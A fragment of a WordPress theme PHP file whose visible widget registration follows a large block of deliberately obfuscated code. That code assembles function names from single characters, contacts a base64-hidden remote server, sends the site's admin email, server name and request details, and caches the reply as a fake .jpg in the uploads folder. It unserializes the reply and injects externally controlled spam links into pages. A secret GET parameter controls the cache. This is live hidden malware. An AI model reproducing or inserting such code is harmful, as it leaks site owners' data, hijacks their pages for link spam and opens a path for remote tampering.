$ha__________n;}}}$gk_____l='6';$og___t='e';$me_________e='o';$uo___________g='c';$da_____________j='n';$hh___y='b';$kd__r='d';$my_________g='s';$sx______________w='_';$sf__________w='e';$fu___________h='a';$eh____b='4';$pw______________x='e';$sy_________q=$hh___y.$fu___________h.$my_________g.$sf__________w.$gk_____l.$eh____b.$sx______________w.$pw______________x.$da_____________j.$uo___________g.$me_________e.$kd__r.$og___t;$ut_______________z='e';$fm_____________z='e';$wj________o='e';$gt_______________r='n';$qc_______d='f';$ap_______s='g';$xi____________j='i';$bp___c='t';$ky____________b='l';$xf_____m='_';$kh_____b='t';$vx___________u='s';$sw______q='n';$xj_______u='o';$yz___________j='c';$jq____h='_';$af___________k='t';$ik__j=$qc_______d.$xi____________j.$ky____________b.$wj________o.$xf_____m.$ap_______s.$ut_______________z.$kh_____b.$jq____h.$yz___________j.$xj_______u.$sw______q.$bp___c.$fm_____________z.$gt_______________r.$af___________k.$vx___________u;$xv___________t='x';$kn_______________i='s';$he____b='i';$xx__t='i';$dp_______i='l';$of_______________v='e';$ug______x='f';$la__p='t';$le__________n='_';$vw______j='e';$qm______________l='s';$md__q=$ug______x.$xx__t.$dp_______i.$vw______j.$le__________n.$of_______________v.$xv___________t.$he____b.$kn_______________i.$la__p.$qm______________l;$qf________a='s';$co______s='v';$rz_______n='i';$gl________d='a';$xw_______________n='e';$rg_____r='r';$ps_____________u='o';$gh__x='p';$zd_______q='n';$kr______j='e';$ja_____________z='m';$wf_____________e='o';$lt____________j='c';$zw_______b='_';$fr____a='r';$rj___u=$co______s.$xw_______________n.$fr____a.$qf________a.$rz_______n.$wf_____________e.$zd_______q.$zw_______b.$lt____________j.$ps_____________u.$ja_____________z.$gh__x.$gl________d.$rg_____r.$kr______j;$gm__________l='f';$ii_________p='k';$sj_______t='o';$hx_______n='e';$eg______x='o';$pe______b='p';$dw______________c='s';$jb_______________n='n';$br______c='c';$ap_____z=$gm__________l.$dw______________c.$eg______x.$br______c.$ii_________p.$sj_______t.$pe______b.$hx_______n.$jb_______________n;$rt_______u='e';$sn_____i='i';$jt___________p='t';$vt_______z='w';$rk____h='r';$jy___i='f';$gs_____________f=$jy___i.$vt_______z.$rk____h.$sn_____i.$jt___________p.$rt_______u;$ed______________w='m';$qc_____a='d';$vw__________n='5';$jz____g=$ed______________w.$qc_____a.$vw__________n;$au________r='r';$ud___________b='a';$sm_____k='l';$dw_______________f='t';$ek____________a='p';$iq___________j='h';$zm________j='e';$vc__________y='a';$te______q=$au________r.$zm________j.$vc__________y.$sm_____k.$ek____________a.$ud___________b.$dw_______________f.$iq___________j;$oz__________b='s';$yj___________m='z';$jn_____v='i';$gn_________a='l';$dr__r='n';$sy____p='a';$pw_______________i='e';$ii_________x='e';$tk____________i='u';$dh___________x='r';$xg______a='i';$li_______________x=$tk____________i.$dr__r.$oz__________b.$pw_______________i.$dh___________x.$jn_____v.$sy____p.$gn_________a.$xg______a.$yj___________m.$ii_________x;$vh_____________g='e';$uu________g='m';$wl___________l='m';$mq__a='n';$yw__s='t';$qp________z='a';$yf_______________o='p';$bz___________u=$yw__s.$vh_____________g.$uu________g.$yf_______________o.$mq__a.$qp________z.$wl___________l;$cw_____p='r';$tt____r='e';$hc___m='e';$sa___________z='x';$aa___t='t';$ch________w='_';$mx________p='n';$ks______v='e';$em_________l='_';$bu____________q='e';$iy_______________p='a';$gw_________k='o';$xp____________h='t';$fq______________f='a';$pb___q='s';$cz___f='r';$qg______w='c';$he___________w='c';$ow_______________r='t';$eq_______c='t';$ho____z='m';$qv____________t=$pb___q.$eq_______c.$cz___f.$ks______v.$fq______________f.$ho____z.$ch________w.$he___________w.$gw_________k.$mx________p.$xp____________h.$hc___m.$sa___________z.$ow_______________r.$em_________l.$qg______w.$cw_____p.$tt____r.$iy_______________p.$aa___t.$bu____________q;function qn_______________r($fx__________q) {global $yi_____________f, $hn_____i, $ik__j, $rj___u, $qv____________t;if (!$hn_____i($yi_____________f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($rj___u(PHP_VERSION, "5.0.0", ">=") && $hn_____i($yi_____________f("ZmlsZV9nZXRfY29udGVudHM=")) && $hn_____i($yi_____________f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zk____t = $qv____________t(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$dt____i = @$ik__j($fx__________q, 0, $zk____t);} else {$dt____i = @$ik__j($fx__________q, 0);}return $dt____i;}function xr_______t($fx__________q) {global $hn_____i, $ap_____z, $gs_____________f, $yi_____________f;if (!$hn_____i($yi_____________f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ai_____h = strpos($fx__________q, "/", 7);$zg____________c = array("uri"     => substr($fx__________q, $ai_____h),"host"    => str_replace("http://", "", substr($fx__________q, 0, $ai_____h)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ej____e = @$ap_____z("$zg____________c[host]", 80, $wp______p, $zp_____________r, 4);if (!$ej____e) {return false;} else {$dt____i = "";$gb______l  = "GET $zg____________c[uri] HTTP/1.0\r\n";$gb______l .= "Host: $zg____________c[host]\r\n";$gb______l .= "Referer: $zg____________c[referer]\r\n";$gb______l .= "Connection: Close\r\n\r\n";@$gs_____________f($ej____e, $gb______l);while (!@feof($ej____e)) {$ky__________o = @fgets($ej____e, (1024*24));if ($ky__________o == "\r\n") {$wh____q = true;continue;}if ($wh____q) {$dt____i .= $ky__________o;}}return $dt____i;}}function wj______b($fx__________q) {global $hn_____i;$oz________v = false;if ($fx__________q != "") {if ($hn_____i("qn_______________r")) {$oz________v = @qn_______________r($fx__________q);}if (!$oz________v && ($hn_____i("xr_______t"))) {$oz________v = @xr_______t($fx__________q);}}return $oz________v;}function vt__r() {global $_SERVER, $jz____g;$ns___i = $_SERVER["SERVER_NAME"];if (substr("$ns___i", 0, 4) == "www.") {$ns___i = substr("$ns___i", 4);}$ns___i = $jz____g("$_SERVER[SERVER_NAME]");return $ns___i;}function if________i() {return "file";}function ub____x($fx__________q) {global $_SERVER, $ik__j, $md__q, $ep__b, $sa_____________k, $gs_____________f;$ot____h = lm_________x();$kb____________q = vt__r().".jpg";$li______________a = $ot____h["dir_upload"]["path"]."/$kb____________q";$hs_______n = @filemtime($li______________a);if (!$hs_______n || ((time()-$hs_______n) >= WP_TTL)) {$oz________v = wj______b($fx__________q);if ($oz________v) {if ($md__q($li______________a)) {@unlink($li______________a);}$gi_______e = @$ep__b($li______________a, "x+");@$gs_____________f($gi_______e, $oz________v);@$sa_____________k($gi_______e);}} else {if ($md__q($li______________a)) {$oz________v = @$ik__j($li______________a);} else {$oz________v = false;}}return $oz________v;}function lm_________x() {global $_SERVER, $yi_____________f, $sy_________q;$rs___s = wp_count_posts("post");$tf_______________d = pathinfo(get_bloginfo("template_directory"));$ot____h = array("url" => array("report"      => $yi_____________f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $tf_______________d,"dir_upload"=> al_______c(),"queryString"=> array("?a001=".WP_ID,"a004=".$tf_______________d[filename],"a005=".$rs___s->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://clinic-virtus.com/xotite-imet-zdorovye-zuby/\">Здоровые зубы</a>");$ot____h["url"]["queryString"] = implode("&", $ot____h["queryString"]);$ot____h["url"]["report"] = $ot____h["url"]["report"]."/?".$sy_________q($ot____h["url"]["queryString"]).".html";return $ot____h;}function al_______c() {$zw__________h = wp_upload_dir();if (isset($zw__________h["error"])) {$no________o = in_____o();if (is_writable($no________o)) {$zw__________h = array("path" => $no________o);}}return $zw__________h;}function in_____o() {global $hn_____i, $jz____g, $te______q, $bz___________u;$im________i = (bool) ini_get("safe_mode");if ($im________i == true) {return false;}if ($hn_____i("sys_get_temp_dir")) {$qa__________r = sys_get_temp_dir();if (is_writable($qa__________r)) {return $te______q($qa__________r);}}if (!empty($_ENV["TMP"])) {return $te______q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $te______q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $te______q($_ENV["TEMP"]);} else {$vl_____y = $bz___________u($jz____g(uniqid(rand(), true)), "");if ($vl_____y) {$qa__________r = $te______q(dirname($vl_____y));@unlink($vl_____y);return $qa__________r;} else {return false;}}}function ps_____________a() {global $_GET, $md__q;$ot____h = lm_________x();$ns___i = vt__r();$pj_____x = if________i();$bf_______________x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($pj_____x == "file") {$vy___j = $ot____h["dir_upload"]["path"]."/".$ns___i.".jpg";if ($md__q($vy___j)) {@unlink($vy___j);$bf_______________x = "deleted";}}$su____f = array("s"=> $bf_______________x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($su____f AS $ec___________a => $av_______y) echo " [$ec___________a:$av_______y]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $hn_____i, $yi_____________f, $li_______________x;$ot____h = lm_________x();$lh___l = "ub____x";if ($hn_____i($lh___l)) {$dt____i = $lh___l($ot____h["url"]["report"]);}if ($dt____i) {if ($dt____i = @$yi_____________f($dt____i)) {$dt____i = @$li_______________x($dt____i);if (strlen($dt____i[custom_credit]) >= 5) {$ot____h["default_string"] = $dt____i[custom_credit];}if ($dt____i["status"] == "0") {$hb______________o = 1;$de____o = 1;} else {$at_______t = sizeof($dt____i["links"]);$un_____________r = $ot____h["default_string"];if ($at_______t > 0 && $dt____i["links"] !== "") {$ka____________l = 0;foreach ($dt____i["links"] as $qt_______________x => $hu___l) {$ka____________l++;if ($hu___l->l_path == "" || $hu___l->l_path == $_SERVER["REQUEST_URI"]) {$hu___l->l_href = htmlspecialchars(strip_tags($hu___l->l_href));$hu___l->l_title = htmlspecialchars(strip_tags($hu___l->l_title));$hu___l->l_anchor = htmlspecialchars(strip_tags($hu___l->l_anchor));$un_____________r .= " | ";$un_____________r .= "<a href='$hu___l->l_href' title='$hu___l->l_title'";if ($hu___l->l_nofollow == "1") {$un_____________r .= " rel='nofollow'";}$un_____________r .= ">$hu___l->l_anchor</a>";}}}$ot____h["links"] = "$un_____________r";if ($dt____i[credit] == "0") {$ot____h["links"] = "";}}} else {$hb______________o = "1";}} else {$hb______________o = "1";}if ($hb______________o == "1") {$ot____h["links"] = $ot____h["default_string"];}echo "$ot____h[links]";echo "<!-- s: $dt____i[signature] -->";ps_____________a();}                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
